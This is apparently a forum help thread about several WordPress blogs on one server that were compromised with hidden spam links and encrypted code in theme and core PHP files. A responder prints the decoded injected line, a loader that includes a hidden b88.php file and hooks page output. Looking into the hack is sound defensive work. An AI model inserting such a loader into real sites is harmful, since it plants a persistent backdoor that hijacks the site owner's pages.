Avatar of Hannahro11
Hannahro11

asked on 

Several Wordpress Blogs Hacked with Outbound Comments HTML Links

Hello,

We need someone to help us fix a Wordpress hack Job where all of the Wordpress sites on our own server have appeared to be hacked by the same breech. This hack is pretty insidious in that it installs hidden outbound links in the stylesheet. Once we hit "approve" to comments it bleeds the blog dry of all page rank (SEO terminology). We do not know how this hole occurred, and we want to fix it on our server. I have attached an example of the hack as it appears in the area compromised. This has occurred on all the blogs in this jail on our server.

The attached file, 'hacked text at bottom of posts.txt', is a sample of what's appended to the post when you view the source - not viewable on the webpage via a browser.
 
The scond text (php-hack) I've manually replaced all of the php files in the blog and the theme - there had been a block of encrypted stuff at the top of many php scripts, the main php scripts for the theme and the main wp style sheet - attached is a sample of that, too; php-hack.txt

Again, let us know if you can help.  php-hack.txt
blog-hack-1.txt
SecurityWordPressVulnerabilities

Avatar of undefined
Last Comment
Russell_Venable
Avatar of Jason C. Levine
Jason C. Levine
Flag of United States of America image

Hi Hannahro11,

Typically what bad guys do is compromise the server via an FTP or shell account and then setup a script that seeks out WordPress (because it is so common) and alters the files there to redirect or display different content.

Is this your own server or is it hosted?
Avatar of Hannahro11
Hannahro11

ASKER

It is our own server.
Avatar of Hannahro11
Hannahro11

ASKER

You are right, this means that the Shell may have been compromised without Cpanel. Or each blog was compromised individually. Strange. What to do. (smile)
My expertise in this sort of ends with WordPress.  I've seen these types of hacks before which is why I commented.  

You should probably hit Request Attention above and ask the Moderators to resend alerts.
I took a look at the encoded php file you sent and this what the unencoded version looks like.

/*eoltijfbzgjhmixzqarebwipjfgniyhagohvmezlkpojkepldd*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/usr/local/www/blogs/getthetrafficnow/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/b88.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Do you still have a copy of that file b88.php? If so can you attach I here? I believe that maybe how they intended on gaining access after the fact, just want to confirm.
Avatar of Hannahro11
Hannahro11

ASKER

I am checking with the sever admin and will get right back. Thank you very much for the right question, by the way.
What did they have to say?
Avatar of Hannahro11
Hannahro11

ASKER

Hi Russell, he is still looking at it. Sorry long night. (smile)
Is there more encrypted files? Also what version of wordpress is being used? Any specific plugging being used?
Avatar of Hannahro11
Hannahro11

ASKER

Yes, I finally got the encrypted files. Attached.

a bit more background...
 
I had painstakingly removed the encoded stuff from all the php files, so I grabbed a header from a file on a different blog in my network.

the b88.php file exists on this other blog, not on the blog that I attached files for previously.
 
not sure what to make of that...
 
but here is the b88.php file
 
In the same folder there was a mysterious c120.php file and sure enough, when I look at it, it's encoded as well...
 
so both files are zipped up and attached.
 
I'll see if I can find one of the old infected files from the original blog (our most pofitable site), I might have kept a copy somewhere.. Also. we are new to Experts-exchange and are sort of interested in who you are (Russell Venable) as we have issues come up all the time.
 encoded-header-1.txt encoded-header-1.txt encoded-header-1.txt c120.txt
b88.txt
Welcome to EE! My Profile pretty much sums it up. I am not sure exactly what you want to know.  I will take a look at the files and see what I can come up with.
ASKER CERTIFIED SOLUTION
Avatar of Russell_Venable
Russell_Venable
Flag of United States of America image

Blurred text
THIS SOLUTION IS ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
See Pricing Options
Start Free Trial
SOLUTION
THIS SOLUTION IS ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
Avatar of Hannahro11
Hannahro11

ASKER

Hello Russell,
Pretty blown away by this. I will take this to my administrators now and see what they both say. I will get back to you as soon as I have their response. Thanks a lot my friend. Be right back.  
Avatar of Hannahro11
Hannahro11

ASKER

Hi Russell.

I think we are uncomfortable talking about this here. Can you email me at <removed> so we can move forward with your line of reasoning?

Thank you.

My name is also Russell
SOLUTION
THIS SOLUTION IS ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
I plan on it :)
SOLUTION
THIS SOLUTION IS ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
Security
Security

Security is the protection of information systems from theft or damage to the hardware, the software, and the information on them, as well as from disruption or misdirection of the services they provide. The main goal of security is protecting assets, and an asset is anything of value and worthy of protection. Information Security is a discipline of protecting information assets from threats through safeguards to achieve the objectives of confidentiality, integrity, and availability or CIA for short. On the other hand, disclosure, alteration, and disruption (DAD) compromise the security objectives.

32K
Questions
--
Followers
--
Top Experts
Get a personalized solution from industry experts
Ask the experts
Read over 600 more reviews

TRUSTED BY

IBM logoIntel logoMicrosoft logoUbisoft logoSAP logo
Qualcomm logoCitrix Systems logoWorkday logoErnst & Young logo
High performer badgeUsers love us badge
LinkedIn logoFacebook logoX logoInstagram logoTikTok logoYouTube logo